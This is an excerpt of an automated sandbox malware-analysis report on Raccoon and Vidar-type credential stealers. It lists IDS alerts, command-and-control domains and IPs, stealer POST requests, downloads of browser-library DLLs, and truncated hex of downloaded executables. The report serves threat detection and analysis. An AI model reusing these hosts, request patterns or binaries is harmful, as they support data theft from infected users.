                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000017.00000003.373977412.0000000003115000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.374942488.0000000003115000.00000004.00000001.sdmp
                          Source: Binary string: shcore.pdb&< source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 3412.exe, 00000014.00000000.368430619.0000000000413000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.359444132.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000017.00000002.423473511.00000000052B0000.00000002.00020000.sdmp
                          Source: Binary string: combase.pdbB< source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000017.00000003.373965754.000000000310F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.375650861.000000000310F000.00000004.00000001.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49884 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.5:49892 -> 78.46.160.87:80
                          Source: TrafficSnort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.5:49907 -> 78.46.160.87:80
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exeDomain query: sehfdkfjvgn.xyz
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                          Source: C:\Windows\explorer.exeDomain query: softwaresworld.net
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Performs DNS queries to domains with low reputationShow sources
                          Source: C:\Windows\explorer.exeDNS query: sehfdkfjvgn.xyz
                          Source: global trafficHTTP traffic detected: GET /@banda5ker HTTP/1.1Host: noc.social
                          Source: global trafficHTTP traffic detected: GET /@banda5ker HTTP/1.1Host: noc.social
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET //l/f/D2vuR34BZ2GIX1a3wJC_/2e2f0b66d11308f3e72c19e69852b8803e8aa69b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: POST /565 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 78.46.160.87Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET //l/f/D2vuR34BZ2GIX1a3wJC_/425dba20a0279b2f685ed1dbaf2a802bdd836261 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /1125 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 78.46.160.87Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 84844Host: 78.46.160.87Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:07 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:17 GMTContent-Type: application/x-msdos-programContent-Length: 312832Connection: closeLast-Modified: Tue, 11 Jan 2022 22:38:01 GMTETag: "4c600-5d5561b176618"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db e7 80 7e 9f 86 ee 2d 9f 86 ee 2d 9f 86 ee 2d 81 d4 7b 2d 88 86 ee 2d 81 d4 6d 2d 19 86 ee 2d 81 d4 6a 2d b1 86 ee 2d b8 40 95 2d 98 86 ee 2d 9f 86 ef 2d 12 86 ee 2d 81 d4 64 2d 9e 86 ee 2d 81 d4 7a 2d 9e 86 ee 2d 81 d4 7f 2d 9e 86 ee 2d 52 69 63 68 9f 86 ee 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f5 92 3d 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 18 01 00 00 2a 04 00 00 00 00 00 07 2f 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 05 00 00 04 00 00 9f 6f 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 5e 01 00 50 00 00 00 00 80 04 00 50 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 51 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 53 16 01 00 00 10 00 00 00 18 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 37 00 00 00 30 01 00 00 38 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 04 03 00 00 70 01 00 00 a4 02 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 cd 00 00 00 80 04 00 00 ce 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:38:52 GMTContent-Type: application/x-msdos-programContent-Length: 590848Connection: closeLast-Modified: Sun, 09 Jan 2022 14:15:02 GMTETag: "90400-5d526d88d6301"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5e 60 89 17 1a 01 e7 44 1a 01 e7 44 1a 01 e7 44 04 53 63 44 33 01 e7 44 04 53 72 44 07 01 e7 44 04 53 64 44 66 01 e7 44 3d c7 9c 44 1f 01 e7 44 1a 01 e6 44 92 01 e7 44 04 53 6d 44 1b 01 e7 44 04 53 73 44 1b 01 e7 44 04 53 76 44 1b 01 e7 44 52 69 63 68 1a 01 e7 44 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6c 5f 9e 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ec 00 00 00 d4 7b 02 00 00 00 00 9f 1c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 ab a3 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 84 07 00 3c 00 00 00 00 50 7b 02 f8 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7c 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 ea 00 00 00 10 00 00 00 ec 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 8d 06 00 00 00 01 00 00 8e 06 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 ba 73 02 00 90 07 00 00 86 00 00 00 7e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 fe 00 00 00 50 7b 02 00 00 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Jan 2022 22:39:07 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
